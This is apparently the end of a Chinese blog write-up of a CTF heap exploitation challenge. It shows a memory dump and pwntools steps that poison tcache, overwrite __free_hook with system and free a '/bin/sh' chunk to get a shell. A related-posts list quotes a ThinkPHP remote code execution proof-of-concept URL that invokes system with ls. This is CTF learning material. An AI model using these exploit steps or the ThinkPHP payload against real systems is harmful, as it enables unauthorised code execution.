0x56257ccda300: 0x0000000000000000  0x00000000000000a1 <-- chunk F. Malloc
0x56257ccda310: 0x4242424242424242  0x4242424242424242
0x56257ccda320: 0x4242424242424242  0x4242424242424242
0x56257ccda330: 0x4242424242424242  0x4242424242424242
0x56257ccda340: 0x4242424242424242  0x4242424242424242
0x56257ccda350: 0x4242424242424242  0x4242424242424242
0x56257ccda360: 0x4242424242424242  0x4242424242424242
0x56257ccda370: 0x4242424242424242  0x4242424242424242
0x56257ccda380: 0x4242424242424242  0x4242424242424242
0x56257ccda390: 0x0000000000000000  0x0000000000000000
0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1

接着malloc到free_hook,然后改为system,再把bin传进去,后面只要输入1就可以执行free了

create(0,0x10,b'RRRR') <--- malloc E from tcache
reset(0) <--- reset the pointer so E does not get freed
create(0,0x10,p64(system)) <--- malloc __free_hook. Overwrite it with system
#ceate chnk z 0x90 pa /bin/sh\0 v hex

create(0,0x90,b"/bin/sh")<--- we will free this chunk to get a shell
#create(0,0xe,"heheshel")

p.sendline('1')<--- just call create again to trigger free
p.sendline('0')<--- send index 0 

p.interactive()

getshell!

Akura@lan
关注
专栏目录
KILL QUEEN CTF
qq_46441427的博客
11-03 229
目录zoom2win zoom2win 检查保护机制 [*] '/home/ubuntu16/Desktop/zoom2win' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 在ida里面看函数 int __cdecl main(int argc, const c
青少年CTF-WEB-Queen
m0_63047884的博客
11-22 1221
先抓包这个页面,然后再头部信息里面添加X-Forwarded-For:127.0.0.1。再次发送发现有回显页面,data后面是一串base64加密的值,先解密看一下。解密之后发现是将用户名和密码加密了,想到有可能是sql注入。提交完显示不是管理员的ip,这里想到用xff绕过。然后直接爆它的sql数据库就可以看到flag了。右键将login.php页面复制到文件。用sqlmap -l 跑就可以了。用户名密码随便输入,点击提交。打开环境,是一个网页登录界面。
[青少年CTF]弱口令实验室招新赛部分WriteUp
个人文章分享
11-29 1176
2022弱口令实验室招新赛部分wp
记一次武汉科技大学ctf新手赛 wuctf2020
weixin_45677731的博客
04-03 1149
这两天做了一下武汉科技大学的新手赛,由于我是小萌新,难的题目都不会,下面是部分简单题的wp Misc 1.Space Club 打开之后是这样的,结合题目,估计可能是一堆空格之类的,用python看一下 运行结果如图,32即为空格的ASCII码,猜测10为分隔符,分隔符之间空格的不同数量即为有用信息,再提取 我这是空格数量+97后的结果,发现分隔符之间的空格数量,要么为6个,要么为12个,由...
WUST-CTF2020 writeup
abtgu的博客
04-02 1578
文章目录WEBcheckinadminMISCSpace ClubWelcome爬Find meShopgirlfriendAlison likes jojo WEB checkin 题目: 无 解题思路: 打开链接,发现提问作者,打开查看器,发现按钮被隐藏,输入框被限制,更改代码,输入作者名,提示一个博客 打开,在最上方发现flag的一部分 仔细查看,有一篇名为《远古的blog》的博客,打...
CTF Just Click
艺博东的博客
09-25 6965
拿到答案需要正确地点击按钮 格式:simCTF{ } 解题链接: http://ctftime2.nisphome.cn/re/rev4.exe 1、点击链接得到了这个 2、使用Exeinfo_PE_0.0.5.3 检测; 3、导入 4、导入之后 5、是C#—>用 NET Reflector来分析—>打开“rev4.exe”—>找顺序 6、发现了这个;然后按顺序点击即可 7、然后就能得到flags了 ...
CTF unserialize3
热门推荐
艺博东的博客
09-25 1万+
题目场景: http://220.249.52.133:52904 (温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、百度搜索:Thinkphp V5.x 远程代码执行漏洞-POC https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%2
CTF baby_web
艺博东的博客
09-25 8535
题目描述:想想初始页面是哪个 题目场景: http://220.249.52.133:49388 1、点击链接进入一下界面 2、URL:把“1.php”为“index.php”—>回车 3、查看源代码(按F12或Fn+F12) 4、点中“Network”—>点击“index.php” 5、Response Headers—>FLAG: flag{very_baby_web} 6、OK flag{very_baby_web} ...
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF-misc工具2-CTF-Tools-masterV1.3.7
最新发布
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码...
CTF题库超详细资源合集
06-14
ctf题库 CTF 题⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
kernel pwn-kernel UAF
qq_46441427的博客
10-24 2237
不同于用户态pwn,内核pwn就不是用python远程拿shell,而是给一个环境包,下载qemu本地起系统。给定以下文件 boot.sh: 一个用于启动 kernel 的 shell 的脚本,多用 qemu,保护措施与 qemu 不同的启动参数有关 bzImage: kernel binary rootfs.cpio: 文件系统映像 ...
ISCC部分pwn题解
qq_46441427的博客
05-25 2005
菜的扣脚刚刚入门堆的辣鸡pwn手 M78 整型漏洞,那个262有点迷,感觉是263 flag{N@x_addr_*EnaBleD%} game 随机数的题,利用python脚本修改随机数种子 再写一个C脚本算随机数 成功拿到flag ISCC{this****&haobdvaljdnvoa0%bor} BOX 有libc,查看发现是libc2.27考虑tcache 写增删改查函数 泄露libc 计算malloc 最后劫持程序流 ISCC{angav**anva&77lnv
20190ctf ageis
qq_46441427的博客
11-24 929
Analysis checksec franex@franex-virtual-machine:~/桌面/babyaegis$ checksec aegis [*] '/home/franex/\xe6\xa1\x8c\xe9\x9d\xa2/babyaegis/aegis' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE:
攻防世界 pwn练习区解法 write up
qq_46441427的博客
02-16 860
checksec stack: canary found 是指运行程序时,会把canary取出放入一个rbp定向的值,在退出函数前将rbp定向的值和canary的值进行一个比较(异或一下,看是不是0),如果不相等,则运行_stack_chk_fail函数 NX 数据所在的内存为不可执行,程序溢出转为shellcode时,程序会去在数据页面上执行指令,这个时候CPU抛出异常,不会让它执行 PIE 程序装在随机的地址 ASLR 即使文件开启了PIE保护,还需要开启ASLR才会真正打乱基址 ...
BUU test your nc
qq_46441427的博客
01-27 555
一.test_your_nc 解法 根据提示,我们直接nc它给的地址,然后ls 发现flag字段,我们cat flag 解析 关于nc命令 nc [-hlnruz][-g<网关…>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v…][-w<超时秒数>][主机名称][通信端口…] 所以此时我们应输入:nc 给定主机号 端口号 此时已经连接到端口,我们ls ls
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值